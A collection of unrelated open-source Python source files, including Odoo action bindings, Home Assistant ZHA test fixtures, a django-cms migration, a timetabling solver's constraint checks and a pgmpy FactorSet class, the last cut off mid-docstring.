def get_defaults_dict(self, cr, uid, model, condition=False):
""" Returns a dictionary mapping field names with their corresponding
default value. This method simply improves the returned value of
:meth:`~.get_defaults`.
"""
return dict((f, v) for i, f, v in self.get_defaults(cr, uid, model, condition))
def set_action(self, cr, uid, name, action_slot, model, action, res_id=False):
"""Binds an the given action to the given model's action slot - for later
retrieval via :meth:`~.get_actions`. Any existing binding of the same action
to the same slot is first removed, allowing an update of the action's name.
See the class description for more details about the various action
slots: :class:`~ir_values`.
:param string name: action label, usually displayed by UI client
:param string action_slot: the action slot to which the action should be
bound to - one of ``client_action_multi``,
``client_print_multi``, ``client_action_relate``,
``tree_but_open``.
:param string model: model name
:param string action: action reference, in the form ``'model,id'``
:param int res_id: optional record id - will bind the action only to a
specific record of the model, not all records.
:return: id of the newly created ir.values entry
"""
assert isinstance(action, basestring) and ',' in action, \
'Action definition must be an action reference, e.g. "ir.actions.act_window,42"'
assert action_slot in ACTION_SLOTS, \
'Action slot (%s) must be one of: %r' % (action_slot, ACTION_SLOTS)
# remove existing action definition of same slot and value
search_criteria = [
('key', '=', 'action'),
('key2', '=', action_slot),
('model', '=', model),
('res_id', '=', res_id or 0), # int field -> NULL == 0
('value', '=', action),
]
self.unlink(cr, uid, self.search(cr, uid, search_criteria))
return self.create(cr, uid, {
'key': 'action',
'key2': action_slot,
'model': model,
'res_id': res_id,
'name': name,
'value': action,
})
@tools.ormcache_context('uid', 'action_slot', 'model', 'res_id', keys=('lang',))
def get_actions(self, cr, uid, action_slot, model, res_id=False, context=None):
"""Retrieves the list of actions bound to the given model's action slot.
See the class description for more details about the various action
slots: :class:`~.ir_values`.
:param string action_slot: the action slot to which the actions should be
bound to - one of ``client_action_multi``,
``client_print_multi``, ``client_action_relate``,
``tree_but_open``.
:param string model: model name
:param int res_id: optional record id - will bind the action only to a
specific record of the model, not all records.
:return: list of action tuples of the form ``(id, name, action_def)``,
where ``id`` is the ID of the default entry, ``name`` is the
action label, and ``action_def`` is a dict containing the
action definition as obtained by calling
:meth:`~openerp.osv.osv.osv.read` on the action record.
"""
assert action_slot in ACTION_SLOTS, 'Illegal action slot value: %s' % action_slot
# use a direct SQL query for performance reasons,
# this is called very often
query = """SELECT v.id, v.name, v.value FROM ir_values v
WHERE v.key = %s AND v.key2 = %s
AND v.model = %s
AND (v.res_id = %s
OR v.res_id IS NULL
OR v.res_id = 0)
ORDER BY v.id"""
cr.execute(query, ('action', action_slot, model, res_id or None))
# map values to their corresponding action record
actions = []
for id, name, value in cr.fetchall():
if not value:
continue # skip if undefined
action_model, action_id = value.split(',')
if action_model not in self.pool:
continue # unknown model? skip it!
action = self.pool[action_model].browse(cr, uid, int(action_id), context)
actions.append((id, name, action))
# process values and their action
user = self.pool['res.users'].browse(cr, uid, uid, context)
results = {}
for id, name, action in actions:
fields = [field for field in action._fields if field not in EXCLUDED_FIELDS]
# FIXME: needs cleanup
try:
action_def = {
field: action._fields[field].convert_to_read(action[field])
for field in fields
}
if action._name in ('ir.actions.report.xml', 'ir.actions.act_window'):
if action.groups_id and not action.groups_id & user.groups_id:
if name == 'Menuitem':
raise AccessError(_('You do not have the permission to perform this operation!!!'))
continue
# keep only the last action registered for each action name
results[name] = (id, name, action_def)
except (AccessError, MissingError):
continue
return sorted(results.values())
def _map_legacy_model_list(self, model_list, map_fn, merge_results=False):
"""Apply map_fn to the various models passed, according to
legacy way to specify models/records.
"""
assert isinstance(model_list, (list, tuple)), \
"model_list should be in the form [model,..] or [(model,res_id), ..]"
results = []
for model in model_list:
res_id = False
if isinstance(model, (list, tuple)):
model, res_id = model
result = map_fn(model, res_id)
# some of the functions return one result at a time (tuple or id)
# and some return a list of many of them - care for both
if merge_results:
results.extend(result)
else:
results.append(result)
return results
# Backards-compatibility adapter layer to retrofit into split API
def set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=False, preserve_user=False, company=False):
"""Deprecated legacy method to set default values and bind actions to models' action slots.
Now dispatches to the newer API methods according to the value of ``key``: :meth:`~.set_default`
(``key=='default'``) or :meth:`~.set_action` (``key == 'action'``).
:deprecated: As of v6.1, ``set_default()`` or ``set_action()`` should be used directly.
"""
assert key in ['default', 'action'], "ir.values entry keys must be in ['default','action']"
if key == 'default':
def do_set(model,res_id):
return self.set_default(cr, uid, model, field_name=name, value=value,
for_all_users=(not preserve_user), company_id=company,
condition=key2)
elif key == 'action':
def do_set(model,res_id):
return self.set_action(cr, uid, name, action_slot=key2, model=model, action=value, res_id=res_id)
return self._map_legacy_model_list(models, do_set)
def get(self, cr, uid, key, key2, models, meta=False, context=None, res_id_req=False, without_user=True, key2_req=True):
"""Deprecated legacy method to get the list of default values or actions bound to models' action slots.
Now dispatches to the newer API methods according to the value of ``key``: :meth:`~.get_defaults`
(``key=='default'``) or :meth:`~.get_actions` (``key == 'action'``)
:deprecated: As of v6.1, ``get_defaults()`` or ``get_actions()`` should be used directly.
"""
assert key in ['default', 'action'], "ir.values entry keys must be in ['default','action']"
if key == 'default':
def do_get(model,res_id):
return self.get_defaults(cr, uid, model, condition=key2)
elif key == 'action':
def do_get(model,res_id):
return self.get_actions(cr, uid, action_slot=key2, model=model, res_id=res_id, context=context)
return self._map_legacy_model_list(models, do_get, merge_results=True)
|
ilexius/odoo
|
openerp/addons/base/ir/ir_values.py
|
Python
|
gpl-3.0
| 25,389
|
import mox
import time
import unittest
from zoom.agent.predicate.health import PredicateHealth
from zoom.common.types import PlatformType
class PredicateHealthTest(unittest.TestCase):
def setUp(self):
self.mox = mox.Mox()
self.interval = 0.1
def tearDown(self):
self.mox.UnsetStubs()
def test_start(self):
pred = PredicateHealth("test", "echo", self.interval, PlatformType.LINUX)
self.mox.StubOutWithMock(pred, "_run")
pred._run().MultipleTimes()
self.mox.ReplayAll()
print "This test should complete quickly"
pred.start()
pred.start() # should noop
pred.start() # should noop
time.sleep(0.25) # give other thread time to check
pred.stop()
self.mox.VerifyAll()
def test_stop(self):
pred = PredicateHealth("test", "echo", self.interval, PlatformType.LINUX)
self.mox.StubOutWithMock(pred, "_run")
pred._run().MultipleTimes()
self.mox.ReplayAll()
pred.start()
time.sleep(0.25) # give other thread time to check
pred.stop()
pred.stop()
pred.stop()
self.mox.VerifyAll()
|
spottradingllc/zoom
|
test/predicate/health_test.py
|
Python
|
gpl-2.0
| 1,195
|
"""Test configuration for the ZHA component."""
from unittest.mock import AsyncMock, MagicMock, PropertyMock, patch
import pytest
import zigpy
from zigpy.application import ControllerApplication
import zigpy.config
import zigpy.group
import zigpy.types
from homeassistant.components.zha import DOMAIN
import homeassistant.components.zha.core.const as zha_const
import homeassistant.components.zha.core.device as zha_core_device
from homeassistant.setup import async_setup_component
from .common import FakeDevice, FakeEndpoint, get_zha_gateway
from tests.common import MockConfigEntry
from tests.components.light.conftest import mock_light_profiles # noqa
FIXTURE_GRP_ID = 0x1001
FIXTURE_GRP_NAME = "fixture group"
@pytest.fixture
def zigpy_app_controller():
"""Zigpy ApplicationController fixture."""
app = MagicMock(spec_set=ControllerApplication)
app.startup = AsyncMock()
app.shutdown = AsyncMock()
groups = zigpy.group.Groups(app)
groups.add_group(FIXTURE_GRP_ID, FIXTURE_GRP_NAME, suppress_event=True)
app.configure_mock(groups=groups)
type(app).ieee = PropertyMock()
app.ieee.return_value = zigpy.types.EUI64.convert("00:15:8d:00:02:32:4f:32")
type(app).nwk = PropertyMock(return_value=zigpy.types.NWK(0x0000))
type(app).devices = PropertyMock(return_value={})
return app
@pytest.fixture(name="config_entry")
async def config_entry_fixture(hass):
"""Fixture representing a config entry."""
entry = MockConfigEntry(
version=2,
domain=zha_const.DOMAIN,
data={
zigpy.config.CONF_DEVICE: {zigpy.config.CONF_DEVICE_PATH: "/dev/ttyUSB0"},
zha_const.CONF_RADIO_TYPE: "ezsp",
},
)
entry.add_to_hass(hass)
return entry
@pytest.fixture
def setup_zha(hass, config_entry, zigpy_app_controller):
"""Set up ZHA component."""
zha_config = {zha_const.CONF_ENABLE_QUIRKS: False}
p1 = patch(
"bellows.zigbee.application.ControllerApplication.new",
return_value=zigpy_app_controller,
)
async def _setup(config=None):
config = config or {}
with p1:
status = await async_setup_component(
hass, zha_const.DOMAIN, {zha_const.DOMAIN: {**zha_config, **config}}
)
assert status is True
await hass.async_block_till_done()
return _setup
@pytest.fixture
def channel():
"""Channel mock factory fixture."""
def channel(name: str, cluster_id: int, endpoint_id: int = 1):
ch = MagicMock()
ch.name = name
ch.generic_id = f"channel_0x{cluster_id:04x}"
ch.id = f"{endpoint_id}:0x{cluster_id:04x}"
ch.async_configure = AsyncMock()
ch.async_initialize = AsyncMock()
return ch
return channel
@pytest.fixture
def zigpy_device_mock(zigpy_app_controller):
"""Make a fake device using the specified cluster classes."""
def _mock_dev(
endpoints,
ieee="00:0d:6f:00:0a:90:69:e7",
manufacturer="FakeManufacturer",
model="FakeModel",
node_descriptor=b"\x02@\x807\x10\x7fd\x00\x00*d\x00\x00",
nwk=0xB79C,
patch_cluster=True,
):
"""Make a fake device using the specified cluster classes."""
device = FakeDevice(
zigpy_app_controller, ieee, manufacturer, model, node_descriptor, nwk=nwk
)
for epid, ep in endpoints.items():
endpoint = FakeEndpoint(manufacturer, model, epid)
endpoint.device = device
device.endpoints[epid] = endpoint
endpoint.device_type = ep["device_type"]
profile_id = ep.get("profile_id")
if profile_id:
endpoint.profile_id = profile_id
for cluster_id in ep.get("in_clusters", []):
endpoint.add_input_cluster(cluster_id, _patch_cluster=patch_cluster)
for cluster_id in ep.get("out_clusters", []):
endpoint.add_output_cluster(cluster_id, _patch_cluster=patch_cluster)
return device
return _mock_dev
@pytest.fixture
def zha_device_joined(hass, setup_zha):
"""Return a newly joined ZHA device."""
async def _zha_device(zigpy_dev):
await setup_zha()
zha_gateway = get_zha_gateway(hass)
await zha_gateway.async_device_initialized(zigpy_dev)
await hass.async_block_till_done()
return zha_gateway.get_device(zigpy_dev.ieee)
return _zha_device
@pytest.fixture
def zha_device_restored(hass, zigpy_app_controller, setup_zha, hass_storage):
"""Return a restored ZHA device."""
async def _zha_device(zigpy_dev, last_seen=None):
zigpy_app_controller.devices[zigpy_dev.ieee] = zigpy_dev
if last_seen is not None:
hass_storage[f"{DOMAIN}.storage"] = {
"key": f"{DOMAIN}.storage",
"version": 1,
"data": {
"devices": [
{
"ieee": str(zigpy_dev.ieee),
"last_seen": last_seen,
"name": f"{zigpy_dev.manufacturer} {zigpy_dev.model}",
}
],
},
}
await setup_zha()
zha_gateway = hass.data[zha_const.DATA_ZHA][zha_const.DATA_ZHA_GATEWAY]
return zha_gateway.get_device(zigpy_dev.ieee)
return _zha_device
@pytest.fixture(params=["zha_device_joined", "zha_device_restored"])
def zha_device_joined_restored(request):
"""Join or restore ZHA device."""
named_method = request.getfixturevalue(request.param)
named_method.name = request.param
return named_method
@pytest.fixture
def zha_device_mock(hass, zigpy_device_mock):
"""Return a zha Device factory."""
def _zha_device(
endpoints=None,
ieee="00:11:22:33:44:55:66:77",
manufacturer="mock manufacturer",
model="mock model",
node_desc=b"\x02@\x807\x10\x7fd\x00\x00*d\x00\x00",
patch_cluster=True,
):
if endpoints is None:
endpoints = {
1: {
"in_clusters": [0, 1, 8, 768],
"out_clusters": [0x19],
"device_type": 0x0105,
},
2: {
"in_clusters": [0],
"out_clusters": [6, 8, 0x19, 768],
"device_type": 0x0810,
},
}
zigpy_device = zigpy_device_mock(
endpoints, ieee, manufacturer, model, node_desc, patch_cluster=patch_cluster
)
zha_device = zha_core_device.ZHADevice(hass, zigpy_device, MagicMock())
return zha_device
return _zha_device
@pytest.fixture
def hass_disable_services(hass):
"""Mock service register."""
with patch.object(hass.services, "async_register"), patch.object(
hass.services, "has_service", return_value=True
):
yield hass
|
turbokongen/home-assistant
|
tests/components/zha/conftest.py
|
Python
|
apache-2.0
| 6,990
|
__author__ = 'takuro'
|
taxpon/pyomni
|
pyomni/object/__init__.py
|
Python
|
mit
| 22
|
from south.db import db
from django.db import models
from cms.plugins.googlemap.models import *
class Migration:
def forwards(self, orm):
# Deleting field 'GoogleMap.public'
db.delete_column('cmsplugin_googlemap', 'public_id')
# Deleting model 'googlemappublic'
db.delete_table('cmsplugin_googlemappublic')
def backwards(self, orm):
# Adding field 'GoogleMap.public'
db.add_column('cmsplugin_googlemap', 'public', orm['googlemap.googlemap:public'])
# Adding model 'googlemappublic'
db.create_table('cmsplugin_googlemappublic', (
('city', orm['googlemap.googlemappublic:city']),
('title', orm['googlemap.googlemappublic:title']),
('mark_delete', orm['googlemap.googlemappublic:mark_delete']),
('zipcode', orm['googlemap.googlemappublic:zipcode']),
('zoom', orm['googlemap.googlemappublic:zoom']),
('content', orm['googlemap.googlemappublic:content']),
('cmspluginpublic_ptr', orm['googlemap.googlemappublic:cmspluginpublic_ptr']),
('address', orm['googlemap.googlemappublic:address']),
))
db.send_create_signal('googlemap', ['googlemappublic'])
models = {
'cms.cmsplugin': {
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', [], {'max_length': '5', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'page': ('models.ForeignKey', [], {'to': "orm['cms.Page']"}),
'parent': ('models.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'plugin_type': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('models.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'publisher_is_draft': ('models.BooleanField', [], {'default': '1', 'db_index': 'True', 'blank': 'True'}),
'publisher_public': ('models.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.CMSPlugin']"}),
'publisher_state': ('models.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.cmspluginpublic': {
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 14, 7, 37, 26, 118649)'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', [], {'max_length': '5', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'mark_delete': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'page': ('models.ForeignKey', [], {'to': "orm['cms.PagePublic']"}),
'parent': ('models.ForeignKey', [], {'to': "orm['cms.CMSPluginPublic']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'plugin_type': ('models.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('models.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.page': {
'changed_by': ('models.CharField', [], {'max_length': '70'}),
'created_by': ('models.CharField', [], {'max_length': '70'}),
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('models.BooleanField', [], {'default': 'True', 'db_index': 'True', 'blank': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'login_required': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'moderator_state': ('models.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('models.CharField', [], {'db_index': 'True', 'max_length': '80', 'null': 'True', 'blank': 'True'}),
'parent': ('models.ForeignKey', [], {'related_name': "'children'", 'blank': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publication_date': ('models.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publication_end_date': ('models.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'published': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'publisher_is_draft': ('models.BooleanField', [], {'default': '1', 'db_index': 'True', 'blank': 'True'}),
'publisher_public': ('models.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Page']"}),
'publisher_state': ('models.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'reverse_id': ('models.CharField', [], {'db_index': 'True', 'max_length': '40', 'null': 'True', 'blank': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('models.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('models.BooleanField', [], {'default': 'False', 'db_index': 'True', 'blank': 'True'}),
'template': ('models.CharField', [], {'max_length': '100'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.pagepublic': {
'changed_by': ('models.CharField', [], {'max_length': '70'}),
'created_by': ('models.CharField', [], {'max_length': '70'}),
'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 14, 7, 37, 26, 379713)'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('models.BooleanField', [], {'default': 'True', 'blank': 'True', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'login_required': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'mark_delete': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'moderator_state': ('models.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('models.CharField', [], {'blank': 'True', 'max_length': '80', 'null': 'True', 'db_index': 'True'}),
'parent': ('models.ForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': "orm['cms.PagePublic']", 'blank': 'True'}),
'publication_date': ('models.DateTimeField', [], {'blank': 'True', 'null': 'True', 'db_index': 'True'}),
'publication_end_date': ('models.DateTimeField', [], {'blank': 'True', 'null': 'True', 'db_index': 'True'}),
'published': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'reverse_id': ('models.CharField', [], {'blank': 'True', 'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('models.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('models.BooleanField', [], {'default': 'False', 'blank': 'True', 'db_index': 'True'}),
'template': ('models.CharField', [], {'max_length': '100'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'googlemap.googlemap': {
'Meta': {'db_table': "'cmsplugin_googlemap'"},
'address': ('models.CharField', [], {'max_length': '150'}),
'city': ('models.CharField', [], {'max_length': '100'}),
'cmsplugin_ptr': ('models.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('models.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zipcode': ('models.CharField', [], {'max_length': '30'}),
'zoom': ('models.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'googlemap.googlemappublic': {
'address': 'models.CharField(max_length=150)',
'city': 'models.CharField(max_length=100)',
'cmspluginpublic_ptr': "models.OneToOneField(to=orm['cms.CMSPluginPublic'], unique=True, primary_key=True)",
'content': 'models.CharField(max_length=255, null=True, blank=True)',
'mark_delete': 'models.BooleanField(default=False, blank=True)',
'title': 'models.CharField(max_length=100, null=True, blank=True)',
'zipcode': 'models.CharField(max_length=30)',
'zoom': 'models.IntegerField(null=True, blank=True)'
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('models.CharField', [], {'max_length': '100'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'name': ('models.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['googlemap']
|
team-xue/xue
|
xue/cms/plugins/googlemap/migrations/0006_publisher2.py
|
Python
|
bsd-3-clause
| 10,224
|
# coding: utf-8
from __future__ import print_function
import time
from functools import wraps
def timethis(func):
@wraps(func)
def wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
print(end - start)
return wrapper
@timethis
def test():
time.sleep(1)
print(test.__name__)
print(dir(test))
print(test.__wrapped__)
test()
|
phyng/python-cookbook
|
9.1.py
|
Python
|
mit
| 418
|
""" Curriculum-based course timetabling solver;
solves timetabling problems formulated in .ectt file format (http://tabu.diegm.uniud.it/ctt/)
Copyright (C) 2013 Stephan E. Becker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>."""
__author__ = 'Stephan Becker'
import math
import data
# hard constraint: Availability
def teacherIsAvailable(event, timeslot):
"""
return True if the teacher of the course is available in the timeslot
"""
if event is None:
return True
for constraint in data.unavailability_constraints:
if event.id == constraint.courseID and timeslot == constraint.timeslot:
return False
return True
# hard constraint: Lectures (part 2 of 2)
def timeslotHasSameLecture(event, timeslot):
"""
checks if a lecture of the same course is already assigned to this timeslot,
returns True if there is already a lecture of the course in this timeslot
"""
if event is None:
return False
for room in range(data.numberOfRooms):
if not data.timetable[(room, timeslot)] is None:
if data.timetable[(room, timeslot)].id == event.id:
return True
return False
def timeslotHasSameTeacher(event, timeslot):
"""
checks if a course with the same teacher is already assigned to this timeslot,
returns True if there is
"""
if event is None:
return False
for room in range(data.numberOfRooms):
currentEv = data.timetable[(room, timeslot)] # is the current course also taught by this teacher?
if not currentEv is None:
if currentEv.id in data.teachers[event.teacher]:
return True
return False
def timeslotHasSameCurriculum(event, timeslot):
"""
checks if a course in the same timeslot is part of the same curriculum
returns True if it is
"""
if event is None:
return False
curriculaOfEvent = data.coursesToCurricula[event.id] # which curricula is this course part of?
for room in range(data.numberOfRooms):
currentEv = data.timetable[(room, timeslot)]
if not currentEv is None:
for cu in curriculaOfEvent: # checks whether the current course is also part of the same curriculum
if currentEv.id in data.curriculaToCourses[cu]:
return True
return False
def assignCourseToPosition(course, position):
"""
assign the course to the position in the timetable
"""
# if data.timetable[position] is None and courseFitsIntoTimeslot(course, position[1]):
data.timetable[position] = course
data.emptyPositions.remove(position)
data.forbiddenPositions.append(position)
def removeCourseAtPosition(position):
"""
remove the course which was assigned at the position from the timetable
and add it to unassigned events
returns the removed course
"""
ev = data.timetable[position]
if not ev is None:
data.timetable[position] = None
data.emptyPositions.append(position)
return ev
def courseFitsIntoTimeslot(course, timeslot):
return not timeslotHasSameLecture(course, timeslot) and teacherIsAvailable(course, timeslot) \
and not timeslotHasSameTeacher(course, timeslot) and not timeslotHasSameCurriculum(course, timeslot)
|
stBecker/CB-CTT_Solver
|
Course timetabling solver/hard.py
|
Python
|
gpl-3.0
| 3,933
|
from .geo_dundee import GeoSatelliteDataDundee
from .geo_jma import GeoSatelliteDataJMA
from .polar import PolarSatelliteData
from .satellites import Satellites
from .mkdir import mkdir_p
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
|
jmozmoz/cloudmap
|
cloudmap/__init__.py
|
Python
|
gpl-3.0
| 289
|
#!/usr/bin/env python3
from functools import reduce
from pgmpy.factors.base import BaseFactor
class FactorSet(object):
r"""
Base class of *DiscreteFactor Sets*.
A factor set provides a compact representation of higher dimensional factor
:math:`\phi_1\cdot\phi_2\cdots\phi_n`
For example the factor set corresponding to factor :math:`\phi_1\cdot\phi_2` would be the union of the factors
:math:`\phi_1` and :math:`\phi_2` i.e. factor set :math:`\vec\phi = \phi_1 \cup \phi_2`.
"""
def __init__(self, *factors_list):
"""
Initialize the factor set class.
Parameters
----------
factors_list: Factor1, Factor2, ....
All the factors whose product is represented by the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set = FactorSet(phi1, phi2)
>>> factor_set
<pgmpy.factors.FactorSet.FactorSet at 0x7f8e32af6d50>
>>> print(factor_set)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4c2d0>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4c710>])
"""
if not all(isinstance(phi, BaseFactor) for phi in factors_list):
raise TypeError("Input parameters must be child classes of BaseFactor")
self.factors = set([factor.copy() for factor in factors_list])
def add_factors(self, *factors):
"""
Adds factors to the factor set.
Parameters
----------
factors: Factor1, Factor2, ...., Factorn
factors to be added into the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3, phi4)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4ca10>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e4c393690>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b4c750>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4cb50>])
"""
self.factors.update(factors)
def remove_factors(self, *factors):
"""
Removes factors from the factor set.
Parameters
----------
factors: Factor1, Factor2, ...., Factorn
factors to be removed from the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b250>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b5b150>])
>>> factor_set1.remove_factors(phi1, phi2)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b4cb10>])
"""
for factor in factors:
self.factors.remove(factor)
def get_factors(self):
"""
Returns all the factors present in factor set.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3)
>>> factor_set1.get_factors()
{<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f827c0a23c8>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f827c0a2358>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f825243f9e8>}
"""
return self.factors
def product(self, factorset, inplace=True):
r"""
Return the factor sets product with the given factor sets
Suppose :math:`\vec\phi_1` and :math:`\vec\phi_2` are two factor sets then their product is a another factors
set :math:`\vec\phi_3 = \vec\phi_1 \cup \vec\phi_2`.
Parameters
----------
factorsets: FactorSet1, FactorSet2, ..., FactorSetn
FactorSets to be multiplied
inplace: A boolean (Default value True)
If inplace = True , then it will modify the FactorSet object, if False, it will
return a new FactorSet object.
Returns
--------
If inpalce = False, will return a new FactorSet object, which is product of two factors
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b690>])
>>> factor_set2.product(factor_set1)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4c910>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4cc50>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b050>,
